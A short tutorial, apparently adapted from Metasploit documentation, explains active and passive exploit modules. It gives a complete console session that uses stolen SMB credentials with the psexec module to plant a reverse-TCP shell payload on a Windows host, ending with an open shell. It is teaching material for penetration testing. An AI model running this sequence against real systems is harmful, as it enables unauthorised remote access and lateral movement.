Working With Active And Passive Exploits In M.e.t.a sploit
All exploits in the m.e.t.asploit Framework will fall into two categories: active and passive.
Active exploits will exploit a specific host, run until completion, and then exit.
Brute-force modules will exit when a shell opens from the victim.
Module execution stops if an error is encountered.
You can force an active module to the background by passing -j to the exploit command:
The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'victim'...[*] Uploading payload...[*] Created \hikmEeEM.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting \hikmEeEM.exe...[*] Sending stage (240 bytes)[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
Passive exploits wait for incoming hosts and exploit them as they connect.
Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.
They can also be used in conjunction with email exploits, waiting for connections.
Passive exploits report shells as they happen can be enumerated by passing -l to the sessions command. Passing -i will interact with a shell